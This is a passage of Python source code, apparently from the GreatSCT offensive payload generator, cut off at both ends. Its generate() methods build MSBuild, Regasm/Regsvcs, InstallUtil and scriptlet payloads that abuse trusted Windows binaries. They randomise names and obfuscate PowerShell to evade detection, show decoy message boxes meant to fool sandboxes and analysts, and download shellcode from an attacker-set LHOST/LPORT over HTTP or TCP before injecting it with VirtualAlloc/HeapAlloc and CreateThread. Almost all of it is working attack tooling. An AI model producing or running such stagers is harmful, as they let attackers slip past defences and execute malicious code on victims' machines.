/usr/share/greatsct/DotNetToJScript.exe /tmp/dotnettojscript.dll -ver auto -c HelloWorld -o {0} -s /tmp/migrate.js" .format("/tmp/greatsct.js")) with open("/tmp/greatsct.js", 'r') as original: data = original.read() with open("/tmp/greatsct.js", 'w') as modified: modified.write( "<scriptlet>\n<registration progid=\"helloworld\">\n<script language=\"JScript\">\nvar {0} = \"{1}\";\n\n" .format(x86, Shellcode) + data + "\n</script>\n</registration>\n</scriptlet>") with open("/tmp/greatsct.js", "r") as js: source_code = js.read() elif self.required_options["SCRIPT_TYPE"][0].lower() == "vbscript": # do stuff with open("/tmp/migrate.vbs", "w") as ff: ff.write("o.Print {0}".format(x86)) os.system( "mcs -platform:x86 -target:library -sdk:2 {0} -out:/tmp/dotnettojscript.dll" .format("/tmp/hta_source.cs")) os.system( "WINEPREFIX=/root/.greatsct wine /usr/share/greatsct/DotNetToJScript.exe /tmp/dotnettojscript.dll -ver auto -l vbscript -c HelloWorld -o {0} -s /tmp/migrate.vbs" .format("/tmp/greatsct.vbs")) with open("/tmp/greatsct.vbs", 'r') as original: data = original.read() with open("/tmp/greatsct.vbs", 'w') as modified: modified.write( "<scriptlet>\n<registration progid=\"helloworld\">\n<script language=\"VBScript\">\nDim {0} : {0} = \"{1}\"\n\n" .format(x86, Shellcode) + data + "\n</script>\n</registration>\n</scriptlet>") with open("/tmp/greatsct.vbs", "r") as vbs: source_code = vbs.read() else: print("Script type not supported") self.payload_source_code = source_code return
def generate(self): options = [] for option in self.cli_opts.c: if "," in option: options = option.split(",") if " " in option: options = option.split(" ") for o in options: for i in self.required_options: if i in o: self.required_options[i][0] = o.strip("{0}=".format(i)) # randomize all our variable names, yo' targetName = bypass_helpers.randomString() namespaceName = bypass_helpers.randomString() className = bypass_helpers.randomString() FunctionName = bypass_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [bypass_helpers.randomString() for x in range(12)] y = [bypass_helpers.randomString() for x in range(17)] with open(self.required_options["SCRIPT"][0], "r") as f: the_script = f.read() if self.required_options["OBFUSCATION"][0].lower() != "x": if self.required_options["FUNCTION"][0] != "x": # Append FUNCTION to end of script the_script += "\n{0}".format( self.required_options["FUNCTION"][0]) if self.required_options["OBFUSCATION"][0].lower() == "binary": the_script = invoke_obfuscation.binaryEncode(the_script) elif self.required_options["OBFUSCATION"][0].lower( ) == "ascii": the_script = invoke_obfuscation.asciiEncode(the_script) self.required_options["FUNCTION"][0] = "x" else: if self.required_options["OBFUSCATION"][0].lower() == "binary": the_script = invoke_obfuscation.binaryEncode(the_script) elif self.required_options["OBFUSCATION"][0].lower( ) == "ascii": the_script = invoke_obfuscation.asciiEncode(the_script) self.required_options["FUNCTION"][0] = "x" if self.required_options["FUNCTION"][0].lower() != "x": # The header for MSBuild XML files # TODO: Fix the awful formatting # Set FUNCTION to None if using Invoke-Obfuscation msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t <PropertyGroup> <FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName> </PropertyGroup> <Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Reference Include="System.Management.Automation" /> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className, self.required_options["FUNCTION"][0]) else: # The header for MSBuild XML files # TODO: Fix the awful formatting # Set FUNCTION to None if using Invoke-Obfuscation msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n\t <PropertyGroup> <FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName> </PropertyGroup> <Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Reference Include="System.Management.Automation" /> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className, "None") if self.required_options["OBFUSCATION"][0].lower() != "x": if self.required_options["OBFUSCATION"][0].lower() == "binary": the_script = invoke_obfuscation.binaryEncode(the_script) elif self.required_options["OBFUSCATION"][0].lower( ) == "ascii": the_script = invoke_obfuscation.asciiEncode(the_script) #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Threading; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n" payload_code += "public class %s : Task, ITask {\n" % (className) payload_code += "\npublic string {0} = \"$(FunctionName)\";".format( FunctionName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 encodedScript = bypass_helpers.randomString() encodedScriptContents = base64.b64encode(bytes( the_script, 'latin-1')).decode('ascii') powershellCmd = bypass_helpers.randomString() data = bypass_helpers.randomString() command = bypass_helpers.randomString() RunPSCommand = bypass_helpers.randomString() cmd = bypass_helpers.randomString() runspace = bypass_helpers.randomString() scriptInvoker = bypass_helpers.randomString() pipeline = bypass_helpers.randomString() results = bypass_helpers.randomString() stringBuilder = bypass_helpers.randomString() obj = bypass_helpers.randomString() RunPSFile = bypass_helpers.randomString() script = bypass_helpers.randomString() ps = bypass_helpers.randomString() e = bypass_helpers.randomString() payload_code += """string {0} = "{1}"; string {2} = ""; if ({3} != "None") {{ byte[] {4} = Convert.FromBase64String({0}); string {5} = Encoding.ASCII.GetString({4}); {2} = {5} + "" + {3}; }} else {{ byte[] {4} = Convert.FromBase64String({0}); string {5} = Encoding.ASCII.GetString({4}); {2} = {5}; }} try {{ Console.Write({6}({2})); }} catch (Exception {7}) {{ Console.Write({7}.Message); }}""".format(encodedScript, encodedScriptContents, powershellCmd, FunctionName, data, command, RunPSCommand, e) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 payload_code += """return true; }} //Based on Jared Atkinson's And Justin Warner's Work public static string {0}(string {1}) {{ Runspace {2} = RunspaceFactory.CreateRunspace(); {2}.Open(); RunspaceInvoke {3} = new RunspaceInvoke({2}); Pipeline {4} = {2}.CreatePipeline(); {4}.Commands.AddScript({1}); {4}.Commands.Add("Out-String"); Collection<PSObject> {5} = {4}.Invoke(); {2}.Close(); StringBuilder {6} = new StringBuilder(); foreach (PSObject {7} in {5}) {{ {6}.Append({7}); }} return {6}.ToString().Trim(); }} public static void {8}(string {9}) {{ PowerShell {10} = PowerShell.Create(); {10}.AddScript({9}).Invoke(); }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps) payload_code += "}\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>" payload_code = msbuild_header + payload_code self.payload_source_code = payload_code return
def generate(self): # randomize all our variable names, yo' classhellcodeName = bypass_helpers.randomString() classhellcodeNameTwo = bypass_helpers.randomString() namespace = bypass_helpers.randomString() key = bypass_helpers.randomString() injectName = bypass_helpers.randomString() execName = bypass_helpers.randomString() bytearrayName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() shellcodeName = bypass_helpers.randomString() rand_bool = bypass_helpers.randomString() random_out = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n" payload_code += "namespace {0}\n {{".format(namespace) payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format( classhellcodeName) # placeholder for legitimate C# program # lets add a message box to throw offf sandbox heuristics and analysts :) payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format( classhellcodeName) payload_code += "\n\t\t[ComRegisterFunction]" payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format( classhellcodeNameTwo, execName) payload_code += "\n[ComUnregisterFunction]" payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classhellcodeNameTwo, execName) payload_code += "\n\tpublic class {0}\n\t{{".format( classhellcodeNameTwo) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) # code for the randomString() function randomStringName = bypass_helpers.randomString() bufferName = bypass_helpers.randomString() charshellcodeName = bypass_helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) # code for the randomString() method payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charshellcodeName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charshellcodeName, charshellcodeName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = bypass_helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code for the genHTTPChecksum() function genHTTPChecksumName = bypass_helpers.randomString() baseStringName = bypass_helpers.randomString() randCharshellcodeName = bypass_helpers.randomString() urlName = bypass_helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharshellcodeName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharshellcodeName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharshellcodeName) payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = bypass_helpers.randomString() strName = bypass_helpers.randomString() webClientName = bypass_helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (shellcodeName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( shellcodeName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % ( shellcodeName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (shellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName) payload_code += " if (%s != null) {\n" % (shellcodeName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, shellcodeName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( shellcodeName, funcAddrName, shellcodeName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName) payload_code += " if (%s != null) {\n" % (shellcodeName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, shellcodeName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, shellcodeName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, shellcodeName, shellcodeName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) randomName = bypass_helpers.randomString() num_tabs_required = 0 payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 3 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % ( shellcodeName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);\n" % (injectName, shellcodeName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return
def generate(self): # randomize all our variable names, yo' classhellcodeName = bypass_helpers.randomString() classhellcodeNameTwo = bypass_helpers.randomString() namespace = bypass_helpers.randomString() key = bypass_helpers.randomString() injectName = bypass_helpers.randomString() execName = bypass_helpers.randomString() bytearrayName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() shellcodeName = bypass_helpers.randomString() rand_bool = bypass_helpers.randomString() random_out = bypass_helpers.randomString() getDataName = helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;\n" payload_code += "namespace {0}\n {{".format(namespace) payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format( classhellcodeName) # placeholder for legitimate C# program # lets add a message box to throw offf sandbox heuristics and analysts :) payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format( classhellcodeName) payload_code += "\n\t\t[ComRegisterFunction]" payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format( classhellcodeNameTwo, execName) payload_code += "\n[ComUnregisterFunction]" payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format( key) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format( classhellcodeNameTwo, execName) payload_code += "\n\tpublic class {0}\n\t{{".format( classhellcodeNameTwo) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) hostName = helpers.randomString() portName = helpers.randomString() ipName = helpers.randomString() sockName = helpers.randomString() length_rawName = helpers.randomString() lengthName = helpers.randomString() sName = helpers.randomString() total_bytesName = helpers.randomString() handleName = helpers.randomString() payload_code += "static byte[] %s(string %s, int %s) {\n" % ( getDataName, hostName, portName) payload_code += " IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % ( ipName, hostName, portName) payload_code += " Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % ( sockName) payload_code += " try { %s.Connect(%s); }\n" % (sockName, ipName) payload_code += " catch { return null;}\n" payload_code += " byte[] %s = new byte[4];\n" % (length_rawName) payload_code += " %s.Receive(%s, 4, 0);\n" % (sockName, length_rawName) payload_code += " int %s = BitConverter.ToInt32(%s, 0);\n" % ( lengthName, length_rawName) payload_code += " byte[] %s = new byte[%s + 5];\n" % (sName, lengthName) payload_code += " int %s = 0;\n" % (total_bytesName) payload_code += " while (%s < %s)\n" % (total_bytesName, lengthName) payload_code += " { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % ( total_bytesName, sockName, sName, total_bytesName, lengthName, total_bytesName, lengthName, total_bytesName) payload_code += " byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % ( handleName, sockName) payload_code += " Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % ( handleName, sName, sName) payload_code += " return %s;}\n" % (sName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName) payload_code += " if (%s != null) {\n" % (shellcodeName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, shellcodeName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( shellcodeName, funcAddrName, shellcodeName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, shellcodeName) payload_code += " if (%s != null) {\n" % (shellcodeName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, shellcodeName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, shellcodeName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, shellcodeName, shellcodeName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) randomName = bypass_helpers.randomString() num_tabs_required = 0 payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 num_tabs_required += 3 payload_code += " byte[] %s = null; %s = %s(\"%s\", %s);\n" % ( sName, sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0]) payload_code += " %s(%s);\n" % (injectName, sName) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 self.payload_source_code = payload_code return
def generate(self): options = [] for option in self.cli_opts.c: if "," in option: options = option.split(",") if " " in option: options = option.split(" ") for o in options: for i in self.required_options: if i in o: self.required_options[i][0] = o.strip("{0}=".format(i)) with open(self.required_options["SCRIPT"][0], "r") as f: the_script = f.read() if self.required_options["FUNCTION"][0].lower() != "x": # Append FUNCTION to end of script the_script += "\n{0}".format(self.required_options["FUNCTION"][0]) FunctionName = self.required_options["FUNCTION"][0] else: FunctionName = "\"None\"" if self.required_options["OBFUSCATION"][0].lower() != "x": if self.required_options["OBFUSCATION"][0].lower() == "binary": the_script = invoke_obfuscation.binaryEncode(the_script) elif self.required_options["OBFUSCATION"][0].lower() == "ascii": the_script = invoke_obfuscation.asciiEncode(the_script) else: the_script = invoke_obfuscation.binaryEncode(the_script) # randomize all our variable names, yo' className = bypass_helpers.randomString() classNameTwo = bypass_helpers.randomString() classNameThree = bypass_helpers.randomString() execName = bypass_helpers.randomString() bytearrayName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() savedStateName = bypass_helpers.randomString() messWithAnalystName = bypass_helpers.randomString() shellcodeName = bypass_helpers.randomString() rand_bool = bypass_helpers.randomString() random_out = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() num_tabs_required = 0 # get random variables for the API imports r = [bypass_helpers.randomString() for x in range(16)] y = [bypass_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n" payload_code += "\tpublic class {0} {{\n".format(className) payload_code += "\t\tpublic static void Main()\n\t\t{\n" # lets add a message box to throw offf sandbox heuristics and analysts :) # there is no decryption routine, troll.level = 9000 # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter. payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n" payload_code += "\t\t}\n\t}\n\n" payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n" payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(classNameTwo) payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(savedStateName) payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameThree, execName) payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree) payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName) payload_code2, num_tabs_required = gamemaker.senecas_games(self) payload_code = payload_code + payload_code2 encodedScript = bypass_helpers.randomString() encodedScriptContents = base64.b64encode(bytes(the_script, 'latin-1')).decode('ascii') powershellCmd = bypass_helpers.randomString() data = bypass_helpers.randomString() command = bypass_helpers.randomString() RunPSCommand = bypass_helpers.randomString() cmd = bypass_helpers.randomString() runspace = bypass_helpers.randomString() scriptInvoker = bypass_helpers.randomString() pipeline = bypass_helpers.randomString() results = bypass_helpers.randomString() stringBuilder = bypass_helpers.randomString() obj = bypass_helpers.randomString() RunPSFile = bypass_helpers.randomString() script = bypass_helpers.randomString() ps = bypass_helpers.randomString() e = bypass_helpers.randomString() payload_code += """string {0} = "{1}"; string {2} = ""; byte[] {3} = Convert.FromBase64String({0}); string {4} = Encoding.ASCII.GetString({3}); {2} = {4}; try {{ Console.Write({5}({2})); }} catch (Exception {6}) {{ Console.Write({6}.Message); }}""".format(encodedScript, encodedScriptContents, powershellCmd, data, command, RunPSCommand, e) while (num_tabs_required != 0): payload_code += '\t' * num_tabs_required + '}' num_tabs_required -= 1 payload_code +="""}} public static string {0}(string {1}) {{ Runspace {2} = RunspaceFactory.CreateRunspace(); {2}.Open(); RunspaceInvoke {3} = new RunspaceInvoke({2}); Pipeline {4} = {2}.CreatePipeline(); {4}.Commands.AddScript({1}); {4}.Commands.Add("Out-String"); Collection<PSObject> {5} = {4}.Invoke(); {2}.Close(); StringBuilder {6} = new StringBuilder(); foreach (PSObject {7} in {5}) {{ {6}.Append({7}); }} return {6}.ToString().Trim(); }} public static void {8}(string {9}) {{ PowerShell {10} = PowerShell.Create(); {10}.AddScript({9}).Invoke(); }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps) payload_code += "\n}" self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) # randomize all our variable names, yo' targetName = bypass_helpers.randomString() namespaceName = bypass_helpers.randomString() className = bypass_helpers.randomString() bytearrayName = bypass_helpers.randomString() funcAddrName = bypass_helpers.randomString() hThreadName = bypass_helpers.randomString() threadIdName = bypass_helpers.randomString() pinfoName = bypass_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [bypass_helpers.randomString() for x in range(12)] y = [bypass_helpers.randomString() for x in range(17)] # The header for MSBuild XML files # TODO: Fix the awful formatting msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}"> <{1} /> </Target> <UsingTask TaskName="{1}" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > <Task> <Code Type="Class" Language="cs"> <![CDATA[ """.format(targetName, className) #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n" payload_code += "public class %s : Task, ITask {\n" % (className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], 